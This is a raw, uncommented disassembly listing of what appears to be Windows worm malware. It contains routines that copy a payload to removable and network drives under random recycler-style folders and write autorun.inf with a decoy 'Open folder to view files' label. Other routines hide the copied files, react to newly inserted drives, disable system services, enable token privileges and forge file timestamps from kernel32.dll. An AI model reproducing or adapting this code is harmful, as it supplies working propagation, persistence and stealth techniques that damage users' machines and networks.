push edx
call esi ; rand
cdq
mov ecx, ebx
idiv ecx
push edx
call esi ; rand
cdq
idiv ebx
push edx
call esi ; rand
cdq
push 64h
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
call esi ; rand
cdq
push 0Ah
pop ecx
idiv ecx
push edx
push offset aSDDDDDDDDDDDDD ; "S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d"
push edi ; Count
lea eax, [ebp+var_260]
push eax ; Dest
mov ebx, _snprintf
call ebx ; _snprintf
add esp, 40h
mov [ebp+var_15D], 0
jmp short loc_9ABD3C
; ---------------------------------------------------------------------------
loc_9ABCFE: ; CODE XREF: sub_9ABB9F+A5�j
call esi ; rand
cdq
push 14h
pop ecx
idiv ecx
add edx, 5
push edx
lea eax, [ebp+Dest]
push eax
call sub_9AC642
call esi ; rand
cdq
push 1Eh
pop ecx
idiv ecx
add edx, 0Ah
push edx
lea eax, [ebp+var_260]
push eax
call sub_9AC642
add esp, 10h
mov edi, 104h
mov ebx, _snprintf
loc_9ABD3C: ; CODE XREF: sub_9ABB9F+15D�j
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Dest]
push eax
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSSSS_S ; "%s%s\\%s\\%s.%s"
push edi ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ebx ; _snprintf
add esp, 20h
mov [ebp+var_59], 0
mov [ebp+var_20], 1
and [ebp+var_30], 0
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+FileName]
push eax ; lpFileName
call FindFirstFileA
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz short loc_9ABD9C
push eax ; hFindFile
call FindClose
loc_9ABD9C: ; CODE XREF: sub_9ABB9F+1F4�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_9ABDAF
cmp [ebp+FindFileData.nFileSizeLow], 0
jnz loc_9ABED4
loc_9ABDAF: ; CODE XREF: sub_9ABB9F+201�j
lea eax, [ebp+Dest]
push eax
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSS_0 ; "%s%s"
push edi ; Count
lea eax, [ebp+PathName]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_261], 0
push 1F01FFh ; int
lea eax, [ebp+PathName]
push eax ; lpFileName
call sub_9AD15E
add esp, 1Ch
push 0 ; lpSecurityAttributes
lea eax, [ebp+PathName]
push eax ; lpPathName
call CreateDirectoryA
mov [ebp+var_20], eax
test eax, eax
jnz short loc_9ABE0D
call GetLastError
cmp eax, 0B7h
jnz loc_9ABED4
loc_9ABE0D: ; CODE XREF: sub_9ABB9F+25B�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+PathName]
push eax
push offset aSS_1 ; "%s\\%s"
push edi ; Count
lea eax, [ebp+var_56C]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_469], 0
push 1F01FFh ; int
lea eax, [ebp+var_56C]
push eax ; lpFileName
call sub_9AD15E
add esp, 1Ch
push 0 ; lpSecurityAttributes
lea eax, [ebp+var_56C]
push eax ; lpPathName
call CreateDirectoryA
mov [ebp+var_20], eax
test eax, eax
jnz short loc_9ABE68
call GetLastError
cmp eax, 0B7h
jnz short loc_9ABEC4
loc_9ABE68: ; CODE XREF: sub_9ABB9F+2BA�j
push 1F01FFh ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9AD15E
lea eax, [ebp+FileName]
push eax ; lpFileName
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
push lpBuffer ; lpBuffer
call sub_9AC7F0
add esp, 14h
mov [ebp+var_20], eax
test eax, eax
jz short loc_9ABEC4
push 1200A9h ; int
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9AD15E
push 21h ; int
lea eax, [ebp+var_56C]
push eax ; lpFileName
call sub_9AD15E
add esp, 10h
mov [ebp+var_30], 1
loc_9ABEC4: ; CODE XREF: sub_9ABB9F+2C7�j
; sub_9ABB9F+2FA�j
push 0 ; int
lea eax, [ebp+PathName]
push eax ; lpFileName
call sub_9AD12D
pop ecx
pop ecx
loc_9ABED4: ; CODE XREF: sub_9ABB9F+20A�j
; sub_9ABB9F+268�j
cmp [ebp+var_20], 0
jz loc_9ABFB1
mov eax, [ebp+hMem]
push dword ptr [eax+4]
push offset aSautorun_inf ; "%sautorun.inf"
push edi ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ebx ; _snprintf
add esp, 10h
mov [ebp+var_59], 0
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+FileName]
push eax ; lpFileName
call FindFirstFileA
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz short loc_9ABF1D
push eax ; hFindFile
call FindClose
loc_9ABF1D: ; CODE XREF: sub_9ABB9F+375�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_9ABF35
cmp [ebp+FindFileData.nFileSizeLow], 1000h
jb short loc_9ABF35
cmp [ebp+var_30], 0
jz short loc_9ABFB1
loc_9ABF35: ; CODE XREF: sub_9ABB9F+382�j
; sub_9ABB9F+38E�j ...
call esi ; rand
cdq
push 14h
pop ecx
idiv ecx
inc edx
push edx
lea eax, [ebp+var_58]
push eax
call sub_9AC642
push offset aMarnwkcw ; "marnwkcw"
lea eax, [ebp+var_58]
push eax ; Str1
call strcmp
add esp, 10h
test eax, eax
jz short loc_9ABF35
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+Dest]
push eax
push offset a_SSS_SS ; ".\\%s\\%s\\%s.%s,%s"
push edi ; Count
lea eax, [ebp+Source]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_6AD], 0
mov eax, [ebp+hMem]
push dword ptr [eax] ; int
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+FileName]
push eax ; lpFileName
call sub_9ABA9B
add esp, 2Ch
jmp short loc_9ABFB1
; ---------------------------------------------------------------------------
loc_9ABFAA: ; DATA XREF: .text:stru_9A4328�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ABFAE: ; DATA XREF: .text:stru_9A4328�o
mov esp, [ebp+ms_exc.old_esp]
loc_9ABFB1: ; CODE XREF: sub_9ABB9F+3A�j
; sub_9ABB9F+44�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+hMem]
push dword ptr [esi+4] ; Memory
call free
pop ecx
push esi ; hMem
call GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9ABB9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABFD3(const CHAR Src)
sub_9ABFD3 proc near ; CODE XREF: sub_9AC078+12�p
ThreadId = dword ptr -4
Src = byte ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+Src], 8000h
jnz locret_9AC076
cmp dword ptr [eax+4], 2
jnz locret_9AC076
mov ecx, [eax+0Ch]
xor al, al
loc_9ABFF3: ; CODE XREF: sub_9ABFD3+2B�j
test cl, 1
jnz short loc_9AC000
shr ecx, 1
inc al
cmp al, 1Ah
jl short loc_9ABFF3
loc_9AC000: ; CODE XREF: sub_9ABFD3+23�j
cmp al, 1
jle short locret_9AC076
add al, 41h
mov [ebp+Src], al
push edi
lea eax, [ebp+Src]
push eax ; lpRootPathName
mov byte ptr [ebp+9], 3Ah
mov byte ptr [ebp+0Ah], 5Ch
mov byte ptr [ebp+0Bh], 0
call GetDriveTypeA
mov edi, eax
cmp edi, 2
jz short loc_9AC036
cmp edi, 3
jz short loc_9AC036
cmp edi, 4
jz short loc_9AC036
cmp edi, 5
jnz short loc_9AC075
loc_9AC036: ; CODE XREF: sub_9ABFD3+52�j
; sub_9ABFD3+57�j ...
push esi
push 8 ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AC074
lea eax, [ebp+Src]
push eax ; Src
mov [esi], edi
call _strdup
pop ecx
mov [esi+4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push esi ; lpParameter
push offset sub_9ABB9F ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
loc_9AC074: ; CODE XREF: sub_9ABFD3+72�j
pop esi
loc_9AC075: ; CODE XREF: sub_9ABFD3+61�j
pop edi
locret_9AC076: ; CODE XREF: sub_9ABFD3+B�j
; sub_9ABFD3+15�j ...
leave
retn
sub_9ABFD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9AC078(int,int,CHAR Src,int)
sub_9AC078 proc near ; DATA XREF: sub_9AC09E+1E�o
arg_4 = dword ptr 0Ch
Src = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 219h
jnz short loc_9AC097
push dword ptr [ebp+Src] ; Src
mov eax, [ebp+arg_C]
call sub_9ABFD3
xor eax, eax
pop ecx
inc eax
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_9AC097: ; CODE XREF: sub_9AC078+A�j
pop ebp
jmp DefWindowProcA
sub_9AC078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AC09E(LPVOID)
sub_9AC09E proc near ; DATA XREF: sub_9AC2BE+6F�o
Dst = byte ptr -58h
var_54 = dword ptr -54h
hInstance = dword ptr -48h
var_34 = dword ptr -34h
Msg = MSG ptr -30h
ClassName = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 58h
push esi
call sub_9AC50B
push 28h ; Size
xor esi, esi
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call memset
add esp, 0Ch
push esi ; lpModuleName
mov [ebp+var_54], offset sub_9AC078
call GetModuleHandleA
mov [ebp+hInstance], eax
call rand
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+ClassName]
add edx, ecx
push edx
push eax
call sub_9AC642
pop ecx
lea eax, [ebp+ClassName]
mov [ebp+var_34], eax
pop ecx
lea eax, [ebp+Dst]
push eax ; lpWndClass
call RegisterClassA
push esi ; lpParam
push [ebp+hInstance] ; hInstance
mov eax, 80000000h
push esi ; hMenu
push esi ; hWndParent
push eax ; nHeight
push eax ; nWidth
push eax ; Y
push eax ; X
push esi ; dwStyle
push offset WindowName ; "recv"
lea eax, [ebp+ClassName]
push eax ; lpClassName
push esi ; dwExStyle
call CreateWindowExA
test eax, eax
jz short loc_9AC14A
push edi
mov edi, GetMessageA
jmp short loc_9AC13C
; ---------------------------------------------------------------------------
loc_9AC123: ; CODE XREF: sub_9AC09E+A9�j
cmp eax, 0FFFFFFFFh
jz short loc_9AC149
lea eax, [ebp+Msg]
push eax ; lpMsg
call TranslateMessage
lea eax, [ebp+Msg]
push eax ; lpMsg
call DispatchMessageA
loc_9AC13C: ; CODE XREF: sub_9AC09E+83�j
push esi ; wMsgFilterMax
push esi ; wMsgFilterMin
lea eax, [ebp+Msg]
push esi ; hWnd
push eax ; lpMsg
call edi ; GetMessageA
cmp eax, esi
jnz short loc_9AC123
loc_9AC149: ; CODE XREF: sub_9AC09E+88�j
pop edi
loc_9AC14A: ; CODE XREF: sub_9AC09E+7A�j
xor eax, eax
pop esi
leave
retn 4
sub_9AC09E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AC151(LPVOID)
sub_9AC151 proc near ; DATA XREF: sub_9AC2BE+57�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov edi, Sleep
mov ebx, 1388h
push ebx ; dwMilliseconds
call edi ; Sleep
call GetLogicalDrives
mov [ebp+var_C], eax
mov [ebp+var_1], 0
loc_9AC175: ; CODE XREF: sub_9AC151+91�j
test byte ptr [ebp+var_C], 1
jz short loc_9AC1D8
cmp [ebp+var_1], 1
jle short loc_9AC1D8
mov al, [ebp+var_1]
add al, 41h
mov [ebp+Src], al
lea eax, [ebp+Src]
push eax ; lpRootPathName
mov [ebp+var_7], 3Ah
mov [ebp+var_6], 5Ch
mov [ebp+var_5], 0
call GetDriveTypeA
cmp eax, 2
mov [ebp+var_10], eax
jz short loc_9AC1AC
cmp eax, 4
jnz short loc_9AC1D8
loc_9AC1AC: ; CODE XREF: sub_9AC151+54�j
push 8 ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AC1D8
mov eax, [ebp+var_10]
mov [esi], eax
lea eax, [ebp+Src]
push eax ; Src
call _strdup
pop ecx
push esi ; LPVOID
mov [esi+4], eax
call sub_9ABB9F
push ebx ; dwMilliseconds
call edi ; Sleep
loc_9AC1D8: ; CODE XREF: sub_9AC151+28�j
; sub_9AC151+2E�j ...
shr [ebp+var_C], 1
inc [ebp+var_1]
cmp [ebp+var_1], 1Ah
jl short loc_9AC175
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_9AC151 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC1ED proc near ; CODE XREF: sub_9A798D+190�p
CommandLine = byte ptr -228h
var_125 = byte ptr -125h
Dest = byte ptr -124h
var_21 = byte ptr -21h
Dst = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 228h
push ebx
push esi
push edi
xor ebx, ebx
push ebx ; Data
push offset aCheckedvalue ; "CheckedValue"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call sub_9AD0F4
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
add esp, 1Ch
push 1 ; bSet
push 40021h ; dwMask
lea eax, [ebp+Dst]
push eax ; lpss
call SHGetSetSettings
mov esi, 104h
push esi ; Count
lea eax, [ebp+Dest]
push offset FileName ; "c:\\c.dll"
push eax ; Dest
call strncpy
add esp, 0Ch
mov [ebp+var_21], bl
xor edi, edi
loc_9AC250: ; CODE XREF: sub_9AC1ED+7E�j
lea eax, [ebp+Dest]
push 5Ch ; Ch
push eax ; Str
call strrchr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9AC26D
inc edi
cmp edi, 3
mov [eax], bl
jl short loc_9AC250
loc_9AC26D: ; CODE XREF: sub_9AC1ED+76�j
cmp [ebp+Dest], bl
jnz short loc_9AC288
lea eax, [ebp+Dest]
push offset a__0 ; "."
push eax ; Dest
call strcpy
pop ecx
pop ecx
loc_9AC288: ; CODE XREF: sub_9AC1ED+86�j
lea eax, [ebp+Dest]
push eax
push offset aExplorerS ; "explorer %s"
lea eax, [ebp+CommandLine]
push esi ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+CommandLine]
push 1 ; int
push eax ; lpCommandLine
mov [ebp+var_125], bl
call sub_9AD3A7
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_9AC1ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC2BE proc near ; CODE XREF: StartAddress:loc_9A793B�p
ThreadId = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push offset aShell32_dll ; "shell32.dll"
call GetModuleHandleA
xor ebx, ebx
cmp eax, ebx
mov esi, offset Buffer
jz short loc_9AC2FC
push 100h ; cchBufferMax
push esi ; lpBuffer
push 4302h ; uID
push eax ; hInstance
call LoadStringA
test eax, eax
jz short loc_9AC2FC
push esi ; Str
call strlen
test eax, eax
pop ecx
jnz short loc_9AC309
loc_9AC2FC: ; CODE XREF: sub_9AC2BE+1B�j
; sub_9AC2BE+31�j
push offset aOpenFolderToVi ; "Open folder to view files"
push esi ; Dest
call strcpy
pop ecx
pop ecx
loc_9AC309: ; CODE XREF: sub_9AC2BE+3C�j
mov esi, CreateThread
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9AC151 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
mov edi, CloseHandle
push eax ; hObject
call edi ; CloseHandle
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9AC09E ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
push eax ; hObject
call edi ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_9AC2BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC33E proc near ; CODE XREF: sub_9AA064:loc_9AA0B2�p
; sub_9AFC25+24�p
RootPathName = byte ptr -108h
var_105 = byte ptr -105h
VolumeSerialNumber= dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h ; uSize
lea eax, [ebp+RootPathName]
push eax ; lpBuffer
mov [ebp+VolumeSerialNumber], 12345678h
call GetSystemDirectoryA
xor eax, eax
push eax ; nFileSystemNameSize
push eax ; lpFileSystemNameBuffer
push eax ; lpFileSystemFlags
push eax ; lpMaximumComponentLength
lea ecx, [ebp+VolumeSerialNumber]
push ecx ; lpVolumeSerialNumber
push eax ; nVolumeNameSize
push eax ; lpVolumeNameBuffer
mov [ebp+var_105], al
lea eax, [ebp+RootPathName]
push eax ; lpRootPathName
call GetVolumeInformationA
mov eax, [ebp+VolumeSerialNumber]
leave
retn
sub_9AC33E endp
; =============== S U B R O U T I N E =======================================
sub_9AC384 proc near ; CODE XREF: sub_9A9DA6+7�p
; sub_9AD6D4+D6�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor eax, eax
mov edx, ecx
and edx, 0FFFFh
inc eax
cmp edx, 0A8C0h
jz short loc_9AC3AE
cmp cl, 0Ah
jz short loc_9AC3AE
and ecx, 0F0FFh
cmp ecx, 10ACh
jnz short locret_9AC3B0
loc_9AC3AE: ; CODE XREF: sub_9AC384+15�j
; sub_9AC384+1A�j
xor eax, eax
locret_9AC3B0: ; CODE XREF: sub_9AC384+28�j
retn
sub_9AC384 endp
; =============== S U B R O U T I N E =======================================
sub_9AC3B1 proc near ; CODE XREF: sub_9AC416+A4�p
; sub_9AD6D4+C9�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
and ecx, 0FFh
xor eax, eax
cmp ecx, 7Fh
jz short loc_9AC414
test ecx, ecx
jz short loc_9AC414
mov ecx, esi
and ecx, 0FFFFh
cmp ecx, 0FEA9h
jz short loc_9AC414
mov ecx, esi
and ecx, 0FEFFh
cmp ecx, 12C6h
jz short loc_9AC414
mov ecx, esi
and ecx, 0FFFFFFh
cmp ecx, 0FFFFFDh
jz short loc_9AC414
mov ecx, esi
mov edx, 0F0h
and ecx, edx
cmp ecx, 0E0h
jz short loc_9AC414
cmp ecx, edx
jz short loc_9AC414
cmp esi, 0FFFFFFFFh
jz short loc_9AC414
inc eax
loc_9AC414: ; CODE XREF: sub_9AC3B1+12�j
; sub_9AC3B1+16�j ...
pop esi
retn
sub_9AC3B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC416(void *Dst,int)
sub_9AC416 proc near ; CODE XREF: sub_9ADBF1+62�p
; sub_9ADBF1+3AC�p
vOutBuffer = byte ptr -4C14h
s = dword ptr -14h
var_10 = dword ptr -10h
cbBytesReturned = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 4C14h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+Dst]
push edi
mov edi, [ebp+arg_4]
lea eax, [edi+edi*2]
shl eax, 2
push eax ; Size
xor ebx, ebx
push ebx ; Val
push esi ; Dst
mov [ebp+var_4], ebx
call memset
add esp, 0Ch
push ebx ; protocol
push 1 ; type
push 2 ; af
call socket
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jz loc_9AC503
push ebx ; lpCompletionRoutine
push ebx ; lpOverlapped
lea ecx, [ebp+cbBytesReturned]
push ecx ; lpcbBytesReturned
push 4C00h ; cbOutBuffer
lea ecx, [ebp+vOutBuffer]
push ecx ; lpvOutBuffer
push ebx ; cbInBuffer
push ebx ; lpvInBuffer
push 4004747Fh ; dwIoControlCode
push eax ; s
call WSAIoctl
test eax, eax
jnz short loc_9AC4FA
mov eax, [ebp+cbBytesReturned]
push 4Ch
xor edx, edx
pop ecx
div ecx
mov [ebp+var_8], ebx
cmp eax, ebx
mov [ebp+cbBytesReturned], eax
jbe short loc_9AC4FA
lea ebx, [ebp+vOutBuffer]
add esi, 8
jmp short loc_9AC49F
; ---------------------------------------------------------------------------
loc_9AC49C: ; CODE XREF: sub_9AC416+E2�j
mov edi, [ebp+arg_4]
loc_9AC49F: ; CODE XREF: sub_9AC416+84�j
cmp [ebp+var_4], edi
jnb short loc_9AC4FA
mov eax, [ebx+8]
mov edi, [ebx+38h]
and edi, eax
mov [ebp+var_10], eax
mov eax, [ebx]
test al, 1
jz short loc_9AC4EC
test al, 4
jnz short loc_9AC4EC
push edi
call sub_9AC3B1
test eax, eax
pop ecx
jz short loc_9AC4EC
cmp [ebp+var_10], 0
jz short loc_9AC4EC
cmp [ebp+var_10], 0FFFFFFFFh
jz short loc_9AC4EC
push dword ptr [ebx+38h] ; netlong
call __imp_ntohl
mov ecx, [ebp+var_10]
inc [ebp+var_4]
not eax
mov [esi-8], ecx
mov [esi-4], edi
mov [esi], eax
add esi, 0Ch
loc_9AC4EC: ; CODE XREF: sub_9AC416+9D�j
; sub_9AC416+A1�j ...
inc [ebp+var_8]
mov eax, [ebp+var_8]
add ebx, 4Ch
cmp eax, [ebp+cbBytesReturned]
jb short loc_9AC49C
loc_9AC4FA: ; CODE XREF: sub_9AC416+65�j
; sub_9AC416+79�j ...
push [ebp+s] ; s
call closesocket
loc_9AC503: ; CODE XREF: sub_9AC416+3D�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9AC416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC50B proc near ; CODE XREF: sub_9A752A+36�p
; StartAddress+15�p ...
PerformanceCount= LARGE_INTEGER ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call GetCurrentThreadId
mov esi, eax
call GetCurrentProcessId
mov edi, eax
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter
test eax, eax
jnz short loc_9AC53A
and dword ptr [ebp+PerformanceCount+4], eax
mov dword ptr [ebp+PerformanceCount], 4362AEB0h
loc_9AC53A: ; CODE XREF: sub_9AC50B+23�j
call GetTickCount
xor eax, dword ptr [ebp+PerformanceCount]
xor eax, edi
xor eax, esi
push eax ; Seed
call srand
pop ecx
pop edi
pop esi
leave
retn
sub_9AC50B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC553(LPCSTR lpServiceName)
sub_9AC553 proc near ; CODE XREF: StartAddress+160�p
; StartAddress+16C�p
hSCObject = dword ptr -20h
ServiceStatus = _SERVICE_STATUS ptr -1Ch
lpServiceName = dword ptr 4
sub esp, 20h
push ebp
push edi
push 0F003Fh ; dwDesiredAccess
xor edi, edi
push edi ; lpDatabaseName
push edi ; lpMachineName
xor ebp, ebp
call OpenSCManagerA
cmp eax, edi
mov [esp+28h+hSCObject], eax
jz short loc_9AC5CF
push ebx
push esi
push 20022h ; dwDesiredAccess
push [esp+34h+lpServiceName] ; lpServiceName
push eax ; hSCManager
call OpenServiceA
mov ebx, CloseServiceHandle
mov esi, eax
cmp esi, edi
jz short loc_9AC5C7
lea eax, [esp+30h+ServiceStatus]
push eax ; lpServiceStatus
push 1 ; dwControl
push esi ; hService
call ControlService
mov ebp, eax
cmp ebp, edi
jz short loc_9AC5AE
push 1388h ; dwMilliseconds
call Sleep
loc_9AC5AE: ; CODE XREF: sub_9AC553+4E�j
push edi ; lpDisplayName
push edi ; lpPassword
push edi ; lpServiceStartName
push edi ; lpDependencies
push edi ; lpdwTagId
push edi ; lpLoadOrderGroup
push edi ; lpBinaryPathName
push 0FFFFFFFFh ; dwErrorControl
push 4 ; dwStartType
push 0FFFFFFFFh ; dwServiceType
push esi ; hService
call ChangeServiceConfigA
push esi ; hSCObject
or ebp, eax
call ebx ; CloseServiceHandle
loc_9AC5C7: ; CODE XREF: sub_9AC553+3A�j
push [esp+30h+hSCObject] ; hSCObject
call ebx ; CloseServiceHandle
pop esi
pop ebx
loc_9AC5CF: ; CODE XREF: sub_9AC553+1C�j
pop edi
mov eax, ebp
pop ebp
add esp, 20h
retn
sub_9AC553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC5D7(LPCSTR lpName,int)
sub_9AC5D7 proc near ; CODE XREF: sub_9A7170+93�p
; sub_9A798D+4F�p
NewState = _TOKEN_PRIVILEGES ptr -14h
hObject = dword ptr -4
lpName = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push edi
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 28h ; DesiredAccess
xor edi, edi
call GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken
test eax, eax
jz short loc_9AC63D
mov eax, [ebp+arg_4]
neg eax
sbb eax, eax
and eax, 2
mov [ebp+NewState.Privileges.Attributes], eax
lea eax, [ebp+NewState.Privileges]
push eax ; lpLuid
push [ebp+lpName] ; lpName
mov [ebp+NewState.PrivilegeCount], 1
push edi ; lpSystemName
call LookupPrivilegeValueA
test eax, eax
jz short loc_9AC634
push edi ; ReturnLength
push edi ; PreviousState
push 10h ; BufferLength
lea eax, [ebp+NewState]
push eax ; NewState
push edi ; DisableAllPrivileges
push [ebp+hObject] ; TokenHandle
call AdjustTokenPrivileges
test eax, eax
jz short loc_9AC634
inc edi
loc_9AC634: ; CODE XREF: sub_9AC5D7+44�j
; sub_9AC5D7+5A�j
push [ebp+hObject] ; hObject
call CloseHandle
loc_9AC63D: ; CODE XREF: sub_9AC5D7+1E�j
mov eax, edi
pop edi
leave
retn
sub_9AC5D7 endp
; =============== S U B R O U T I N E =======================================
sub_9AC642 proc near ; CODE XREF: sub_9A752A+31�p
; sub_9A798D+AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9AC66A
loc_9AC653: ; CODE XREF: sub_9AC642+26�j
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_9AC653
loc_9AC66A: ; CODE XREF: sub_9AC642+F�j
mov byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_9AC642 endp
; =============== S U B R O U T I N E =======================================
sub_9AC672 proc near ; CODE XREF: sub_9A9318+81�p
; sub_9A9318+BA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9AC69B
loc_9AC683: ; CODE XREF: sub_9AC672+27�j
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add edx, 61h
mov [ebx+esi*2], dx
inc esi
cmp esi, edi
jl short loc_9AC683
loc_9AC69B: ; CODE XREF: sub_9AC672+F�j
and word ptr [ebx+edi*2], 0
pop edi
pop esi
pop ebx
retn
sub_9AC672 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC6A4(LPCSTR lpFileName)
sub_9AC6A4 proc near ; CODE XREF: sub_9A752A+FE�p
; sub_9A9318+200�p ...
FileName = byte ptr -11Ch
LastWriteTime = _FILETIME ptr -18h
CreationTime = _FILETIME ptr -10h
LastAccessTime = _FILETIME ptr -8
lpFileName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
push 104h ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
push offset aKernel32_dll ; "kernel32.dll"
call GetModuleHandleA
push eax ; hModule
call GetModuleFileNameA
mov esi, CreateFileA
xor ebx, ebx
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call esi ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AC73C
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push edi ; hFile
call GetFileTime
push edi ; hObject
mov edi, CloseHandle
call edi ; CloseHandle
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9AC73C
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
